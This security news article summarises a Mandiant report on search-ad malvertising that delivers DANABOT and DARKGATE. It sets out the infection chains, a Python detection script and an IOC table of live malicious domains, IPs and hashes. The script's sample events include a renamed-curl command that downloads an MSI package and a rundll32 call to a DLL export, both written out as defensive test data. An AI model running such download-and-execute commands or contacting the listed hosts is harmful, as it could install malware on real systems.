Hackers Abusing Search Engine Ads to Deliver DANABOT & DARKGATE Malwares

by Esmeralda McKenzie

Threat actors are purchasing ads that point to malicious websites in order to lure victims into downloading malware, which can ultimately lead to data theft and ransomware.

This technique has been used across multiple ad platforms, including search engine ads and social media ads, because these platforms offer a wide range of targeting controls such as specific audiences, geographic regions, IP address ranges, browsing history, and device types.

Search Engine Ads Bring Malware

According to the report shared with Cyber Security News, four different malware families were observed during the investigation of these malicious ad campaigns:

  • PAPERDROP – VBScript-based downloader that communicates over HTTPS and downloads and executes DANABOT.
  • PAPERTEAR – VBScript-based downloader observed enumerating the list of local processes.
  • DANABOT – Backdoor written in Delphi that uses a custom binary protocol over TCP.
  • DARKGATE – Backdoor written in Delphi that is capable of capturing keystrokes, executing commands, transferring files, and stealing credentials.

In addition, three different delivery chains were observed; two of them used a renamed copy of the cURL binary.

Infection Chain #1: PAPERDROP > DANABOT

In this infection chain, the wscript.exe process is used to initiate a DNS query, after which the Windows Installer utility msiexec.exe is executed to install an application. The installer then uses the rundll32.exe process to load the dropper DLL and call its "start" export, which launches the DANABOT payload.

Infection Chain #1 (Source: Mandiant)

Infection Chain #2: PAPERTEAR > RENAMED CURL > DARKGATE

In this second infection chain, the PAPERTEAR downloader initiates an HTTP POST request to infocatalog[.]pics over port 8080. After this, wscript.exe executes a one-liner command that ultimately drops the DARKGATE malware onto the victim's system.

Infection Chain #2 (Source: Mandiant)

Infection Chain #3: PAPERDROP > RENAMED CURL > DANABOT

The third execution chain is similar to the second one, but here the PAPERDROP downloader executes another extended one-liner that uses the renamed curl.exe binary to download and install a malicious package file, which in turn drops the DANABOT malware.

Infection Chain #3 (Source: Mandiant)
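The three chains share a small set of host behaviours that are easy to express as detection logic: a script host (wscript.exe) handing off to msiexec.exe or rundll32.exe, rundll32.exe calling a "start" export in a DLL that lives under a user-writable path, a script host making its own outbound connection, and curl.exe running under a different file name. The following Python is an added example written for this page, not code from the article or from Mandiant's report. It encodes those behaviours as rules and runs them over a handful of constructed Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records; the field names follow Sysmon, but every record, path and the example.invalid URL is a placeholder, and the only real indicator used is the infocatalog[.]pics C2 named above. The renamed-curl check relies on the PE version-info OriginalFileName, which renaming the file on disk does not change.

```python
"""Detection checks for the PAPERDROP/PAPERTEAR delivery chains (added example).

Events are modelled on Sysmon Event ID 1 (process creation) and Event ID 3
(network connection). All records below are constructed for this example.
"""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Binaries the chains hand off to once the VBScript downloader is running.
HANDOFF_BINARIES = {"msiexec.exe", "rundll32.exe", "cmd.exe", "powershell.exe"}
USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.IGNORECASE)
# rundll32.exe <dll>,<export>   (DLL path may or may not be quoted)
RUNDLL32_EXPORT = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+?\.dll)"?\s*,\s*(?P<export>[A-Za-z_]\w*)',
    re.IGNORECASE,
)

SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    # Chain 1: wscript.exe -> msiexec.exe -> rundll32.exe <dropper.dll>,start
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\Public\setup.msi /qn",
     "OriginalFileName": "msiexec.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\drop.dll,start",
     "OriginalFileName": "RUNDLL32.EXE"},
    # Chain 2: PAPERTEAR (running under wscript.exe) posts to the C2 on 8080
    {"EventID": 3, "Image": r"C:\Windows\System32\wscript.exe",
     "DestinationHostname": "infocatalog[.]pics", "DestinationPort": 8080},
    # Chains 2 and 3: curl.exe copied under another name fetches the package
    {"EventID": 1, "Image": r"C:\Users\Public\ssl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"ssl.exe -s -o C:\Users\Public\pkg.msi http://example.invalid/pkg.msi",
     "OriginalFileName": "curl.exe"},
    # Benign control: the real curl.exe run by an administrator
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "curl.exe -sS https://example.invalid/",
     "OriginalFileName": "curl.exe"},
]


def _base(path):
    return ntpath.basename(path).lower()


def rule_script_host_spawns_handoff(ev):
    """Chain 1: a script host (the VBScript downloader) starting msiexec/rundll32."""
    if ev.get("EventID") != 1:
        return None
    parent, child = _base(ev["ParentImage"]), _base(ev["Image"])
    if parent in SCRIPT_HOSTS and child in HANDOFF_BINARIES:
        return f"{parent} spawned {child}"
    return None


def rule_rundll32_start_from_user_path(ev):
    """Chain 1: rundll32 calling a 'start' export in a DLL under a user-writable path."""
    if ev.get("EventID") != 1 or _base(ev["Image"]) != "rundll32.exe":
        return None
    m = RUNDLL32_EXPORT.search(ev.get("CommandLine", ""))
    if m and m.group("export").lower() == "start" and USER_WRITABLE.search(m.group("dll")):
        return f"rundll32 called export 'start' in {m.group('dll')}"
    return None


def rule_renamed_curl(ev):
    """Chains 2 and 3: curl.exe executing under a different file name."""
    if ev.get("EventID") != 1:
        return None
    if ev.get("OriginalFileName", "").lower() == "curl.exe" and _base(ev["Image"]) != "curl.exe":
        return f"curl.exe running as {_base(ev['Image'])}"
    return None


def rule_script_host_network(ev):
    """Chain 2: an outbound connection made directly by a script host."""
    if ev.get("EventID") != 3 or _base(ev["Image"]) not in SCRIPT_HOSTS:
        return None
    dest = ev.get("DestinationHostname") or ev.get("DestinationIp", "?")
    return f"{_base(ev['Image'])} connected to {dest}:{ev['DestinationPort']}"


RULES = [rule_script_host_spawns_handoff, rule_rundll32_start_from_user_path,
         rule_renamed_curl, rule_script_host_network]


def detect(events):
    """Return (rule name, summary) for every rule that fires on every event."""
    hits = []
    for ev in events:
        for rule in RULES:
            summary = rule(ev)
            if summary:
                hits.append((rule.__name__, summary))
    return hits


if __name__ == "__main__":
    for name, summary in detect(SAMPLE_EVENTS):
        print(f"{name}: {summary}")
```

Run stand-alone, the script reports four hits (one per malicious record) and stays silent on the benign curl.exe invocation. The rundll32 and renamed-curl rules are precise enough to alert on; rule_script_host_network will also fire on legitimate logon scripts that fetch content, so treat it as a hunting signal and tune HANDOFF_BINARIES and USER_WRITABLE to your own estate.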

Furthermore, a full report has been published that provides detailed information on the malware capabilities, execution methods, infection chains, and other findings.

Indicators of Compromise

Type | Value | Campaign | Malware Family | Attribution
Domain | www.claimprocessing[.]org | 23-046 | | UNC2975
Domain | www.treasurydept[.]org | 23-046 | | UNC2975
Domain | www.assetfinder[.]org | 23-046 | | UNC2975
Domain | gfind[.]org | 23-046 | | UNC2975
Domain | claimunclaimed[.]org | 23-046 | | UNC2975
Domain | treasurydept[.]org | 23-046 | | UNC2975
Domain | www.myunclaimedcash[.]org | 23-046 | | UNC2975
Domain | freelookup[.]org | 23-046 | | UNC2975
Domain | capitalfinders[.]org | 23-046 | | UNC2975
Domain | plano.soulcarelife[.]org | 23-046 | PAPERDROP | UNC2975
Domain | pittsburgh.soulcarelife[.]org | 23-046 | PAPERDROP | UNC2975
Domain | durham.soulcarelife[.]org | 23-046 | PAPERDROP | UNC2975
Domain | mesa.halibut[.]sbs | 23-046 | PAPERDROP | UNC2975
Domain | arlington.barracudas[.]sbs | 23-046 | PAPERDROP | UNC2975
Domain | lugbara[.]top | 23-046 | PAPERDROP | UNC2975
Domain | lewru[.]top | 23-046 | PAPERDROP | UNC2975
Domain | infocatalog[.]pics | 23-046 | DARKGATE | UNC5085
Domain | bikeontop[.]shop | 23-046 | DARKGATE | UNC5085
Domain | positivereview[.]cloud | 23-046 | DARKGATE | UNC5085
Domain | dreamteamup[.]shop | 23-046 | DARKGATE | UNC5085
Domain | whatup[.]cloud | 23-046 | DARKGATE | UNC5085
Domain | thebesttime[.]buzz | 23-046 | DARKGATE | UNC5085
IP Address | 47.253.165[.]1 | 23-046 | | UNC2975
IP Address | 8.209.99[.]230 | 23-046 | | UNC2975
IP Address | 47.252.45[.]173 | 23-046 | | UNC2975
IP Address | 47.252.33[.]131 | 23-046 | | UNC2975
IP Address | 47.253.141[.]12 | 23-046 | | UNC2975
IP Address | 34.16.181[.]0 | 23-046 | DANABOT |
IP Address | 35.247.194[.]72 | 23-046 | DANABOT |
IP Address | 35.203.111[.]228 | 23-046 | DANABOT |
IP Address | 94.228.169[.]143 | 23-051 | PAPERTEAR | UNC5085
MD5 | 9f9c5a1269667171e1ac328f7f7f6cb3 | 23-046 | DARKGATE | UNC5085
MD5 | 2c16eafd0023ea5cb8e9537da442047e | 23-046 | PAPERDROP (Type I) | UNC2975
MD5 | 7544f5bb88ad481f720a9d9f94d95b30 | 23-046 | PAPERDROP (Type I) | UNC2975
MD5 | 862a42a91b5734062d47c37fdd80c633 | | PAPERDROP (Type II) | UNC2956
MD5 | 650b0b12b21e9664d5c771d78738cf9f | | PAPERTEAR | UNC5085
MD5 | 9120c82b0920b9db39894107b5494ccd | 23-051 | PAPERTEAR | UNC5085
Source: Mandiant

Source credit : cybersecuritynews.com
